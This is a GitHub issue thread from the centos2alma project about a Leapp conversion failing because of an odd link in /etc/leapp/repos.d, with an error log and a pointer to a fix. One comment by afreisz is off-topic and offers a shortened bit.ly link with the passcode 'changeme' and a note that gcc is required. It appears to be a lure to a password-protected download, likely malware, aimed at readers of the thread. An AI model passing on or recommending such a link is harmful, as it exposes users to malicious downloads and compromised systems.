### ISSUE TITLE
Conversion fails if there are misleading links in /etc/leapp/repos.d

### ISSUE THREAD

**Issue by SandakovMM** [plesk/centos2alma#341]
## Description

We discovered that sometimes specific links point to the Leapp sources in the /etc/leapp/repos.d directory, such as `/etc/leapp/repos.d/system_upgrade;66d7e0d7`. When Leapp tries to use them to call internal scripts, it fails with the following error
```
2024-09-04 19:06:28,395 - INFO - ============================================================
2024-09-04 19:06:28,395 - INFO - 2024-09-04 19:06:26.563154 [ERROR] Actor: dnf_transaction_check
2024-09-04 19:06:28,395 - INFO - Message: Failed to execute script to apply transaction workaround yum config fix. Message: Command ['systemd-nspawn', '-register=no', 'quiet', '-D', u'/var/lib/leapp/scratch/mounts/root_/system_overlay', 'setenv=LEAPP_OVL_SIZE=4096', 'setenv=LEAPP_UPGRADE_PATH_TARGET_RELEASE=8.9', 'setenv=LEAPP_NO_RHSM=0', 'setenv=LEAPP_EXPERIMENTAL=0', 'setenv=LEAPP_UPGRADE_PATH_FLAVOUR=default', 'setenv=LEAPP_COMMON_TOOLS=:/etc/leapp/repos.d/system_upgrade;66d7e0d7/common/tools:/etc/leapp/repos.d/system_upgrade;66d7e0d7/el7toel8/tools', 'setenv=LEAPP_COMMON_FILES=:/etc/leapp/repos.d/system_upgrade;66d7e0d7/common/files:/etc/leapp/repos.d/system_upgrade;66d7e0d7/el7toel8/files', 'setenv=LEAPP_IPU_IN_PROGRESS=7to8', 'setenv=LEAPP_UNSUPPORTED=0', 'setenv=LEAPP_EXECUTION_ID=b5a24ee8-ba5b-46b2-bf0e-0dd6e78cdbe9', '-setenv=LEAPP_HOSTNAME=newvps.skyevents.biz', '/bin/bash', '-c', u'/etc/leapp/repos.d/system_upgrade;66d7e0d7/el7toel8/tools/handleyumconfig'] failed with exit code 127.
2024-09-04 19:06:28,395 - INFO - ============================================================
2024-09-04 19:06:28,395 - INFO - END OF ERRORS
2024-09-04 19:06:28,395 - INFO - ============================================================
2024-09-04 19:06:28,395 - INFO - Debug output written to /var/log/leapp/leapp-preupgrade.log
2024-09-04 19:06:28,395 - INFO - ============================================================
2024-09-04 19:06:28,395 - INFO - REPORT OVERVIEW
2024-09-04 19:06:28,396 - INFO - ============================================================
2024-09-04 19:06:28,396 - INFO - Following errors occurred and the upgrade cannot continue:
2024-09-04 19:06:28,396 - INFO - 1. Actor: dnf_transaction_check
2024-09-04 19:06:28,396 - INFO - Message: Failed to execute script to apply transaction workaround yum config fix. Message: Command ['systemd-nspawn', '-register=no', 'quiet', '-D', u'/var/lib/leapp/scratch/mounts/root_/system_overlay', 'setenv=LEAPP_OVL_SIZE=4096', 'setenv=LEAPP_UPGRADE_PATH_TARGET_RELEASE=8.9', 'setenv=LEAPP_NO_RHSM=0', 'setenv=LEAPP_EXPERIMENTAL=0', 'setenv=LEAPP_UPGRADE_PATH_FLAVOUR=default', 'setenv=LEAPP_COMMON_TOOLS=:/etc/leapp/repos.d/system_upgrade;66d7e0d7/common/tools:/etc/leapp/repos.d/system_upgrade;66d7e0d7/el7toel8/tools', 'setenv=LEAPP_COMMON_FILES=:/etc/leapp/repos.d/system_upgrade;66d7e0d7/common/files:/etc/leapp/repos.d/system_upgrade;66d7e0d7/el7toel8/files', 'setenv=LEAPP_IPU_IN_PROGRESS=7to8', 'setenv=LEAPP_UNSUPPORTED=0', 'setenv=LEAPP_EXECUTION_ID=b5a24ee8-ba5b-46b2-bf0e-0dd6e78cdbe9', '-setenv=LEAPP_HOSTNAME=newvps.skyevents.biz', '/bin/bash', '-c', u'/etc/leapp/repos.d/system_upgrade;66d7e0d7/el7toel8/tools/handleyumconfig'] failed with exit code 127.
2024-09-04 19:06:28,396 - INFO - HIGH and MEDIUM severity reports:
```
It is unclear why this link was created, but we should check such links on the centos2alma side to avoid the problem.

## Workaround
Just remove the link.

**Comment by afreisz** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by SandakovMM** [comment]
The problem should be fixed by #343
